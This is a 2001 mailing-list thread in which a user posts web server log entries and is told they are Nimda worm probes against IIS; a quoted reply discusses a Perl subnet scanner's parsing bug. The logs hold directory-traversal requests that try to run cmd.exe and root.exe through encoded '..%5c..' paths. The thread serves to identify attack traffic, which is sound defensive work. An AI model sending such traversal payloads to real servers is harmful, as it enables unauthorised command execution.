These are Nimda attacks looking to an IIS server on NT.
----- Original Message ----- From: "Guardian Lew" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Monday, October 15, 2001 5:32 AM Subject: RE: [sambar] Nimda interesting > Can someone tell me what these few lines mean? > > 65.10.89.6 - - [13/Oct/2001:01:38:34 -0500] "GET /scripts/root.exe?/c+dir > HTTP/1.0" 404 0 0 "-" "-" > 65.10.89.6 - - [13/Oct/2001:01:38:35 -0500] "GET /MSADC/root.exe?/c+dir > HTTP/1.0" 404 0 0 "-" "-" > 65.10.89.6 - - [13/Oct/2001:01:38:36 -0500] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-" > 65.10.89.6 - - [13/Oct/2001:01:38:37 -0500] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-" > 65.10.89.6 - - [13/Oct/2001:01:38:38 -0500] "GET > /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-" > 65.10.89.6 - - [13/Oct/2001:01:38:39 -0500] "GET > /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" > 404 0 0 "-" "-" > 65.10.89.6 - - [13/Oct/2001:01:38:43 -0500] "GET > /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" > 404 0 0 "-" "-" > 65.10.89.6 - - [13/Oct/2001:01:38:45 -0500] "GET > /msadc/..%5c../..%5c../..%5c/..A ../..A ../..A ../winnt/system32/cmd.exe?/c+ > dir HTTP/1.0" 404 0 0 "-" "-" > 65.10.89.6 - - [13/Oct/2001:01:38:46 -0500] "GET > /scripts/..A ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-" > 65.10.89.6 - - [13/Oct/2001:01:38:47 -0500] "GET > /scripts/..A/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-" > 65.10.89.6 - - [13/Oct/2001:01:38:48 -0500] "GET > /scripts/..A?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-" > 65.10.89.6 - - [13/Oct/2001:01:38:50 -0500] "GET > /scripts/..Ao../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-" > 65.10.89.6 - - [13/Oct/2001:01:38:51 -0500] "GET > /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-" > 65.10.89.6 - - [13/Oct/2001:01:38:52 -0500] "GET > /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-" > > God has special angels I know a lot. > http://angelstore.net > > -----Original Message----- > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of > Jeff Adams > Sent: Sunday, October 14, 2001 10:19 PM > To: [EMAIL PROTECTED] > Subject: Re: [sambar] Nimda interesting > > At 09:33 PM 10/14/2001 -0500, Danny Mallory <[EMAIL PROTECTED]> > wrote: > > >I have to agree. There are many fancier scanners out there. As I mentioned > >the one that I wrote > >is for quick floppy utility to gather information on a new network. If you > >want ours you can get > >it at http://www.cnsonline.com under toolshelp section. > > > >Danny > > Neat Perl script, Danny. The only problem I had was scanning a subnet with > a third octet of 0 (i.e. 192.168.0.0). In my example, the code that sets > the subnet variable (shown below) sets it to 192.168, thus the discovery > searches for 192.168.1, 192.168.2, ..., 192.168.255. > > $subnet = substr($a, 0, index("$a",".0")); > > Other than that little issue, which I worked around easily, I found it to > be a nice tool. > > Thanks for sharing! > > -Jeff > > > -------------------------------------------------------------------------- -- > ---- > For unsubscription of this list send an email to [EMAIL PROTECTED] with > email > data containing unsubscribe emailadd sambar > > -------------------------------------------------------------------------- ------ > For unsubscription of this list send an email to [EMAIL PROTECTED] with email > data containing unsubscribe emailadd sambar > > -------------------------------------------------------------------------------- For unsubscription of this list send an email to [EMAIL PROTECTED] with email data containing unsubscribe emailadd sambar
